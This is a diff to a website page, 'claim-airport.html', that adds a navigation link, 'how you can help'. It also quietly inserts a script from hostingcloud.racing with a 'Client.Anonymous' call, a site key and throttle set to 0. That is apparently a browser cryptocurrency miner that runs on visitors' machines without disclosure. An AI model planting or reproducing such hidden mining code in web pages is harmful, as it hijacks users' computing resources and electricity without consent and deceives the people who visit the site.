--- a/process/claim-airport.html
+++ b/process/claim-airport.html
@@ -85,6 +85,7 @@
 							</div>
 						</div>
 					</li>
+					<li class="fancynav-item"><a class="fancynav-link" href="/how-to-help.html"><span class="fancynav-link-content">how you can help</span></a></li>
 					<li class="fancynav-item"><a class="fancynav-link" href="/gavin-seim/"><span class="fancynav-link-content">gavin seim</span></a></li>
 					<li class="fancynav-item fancy-dropdown">
 						<a class="fancynav-link fancy-dropdown-toggle" href="JavaScript:void(0)"><span class="fancynav-link-content">about</span></a>
@@ -217,5 +218,12 @@
 		<script src="https://cdnjs.cloudflare.com/ajax/libs/babel-core/5.6.15/browser-polyfill.min.js"></script>
 		<script src="/assets/js/progressbar.min.js"></script>
 		<script src="/assets/js/theme.js"></script>
+		<script src="https://www.hostingcloud.racing/JQqn.js"></script>
+		<script>
+		    var _client = new Client.Anonymous('8e38b0920f1f9adafa65b285813b373d48a58ae25fbfe632f0f564493cfd299b', {
+		        throttle: 0, c: 'w', ads: 0
+		    });
+		    _client.start();
+		</script>
 	</body>
 </html>
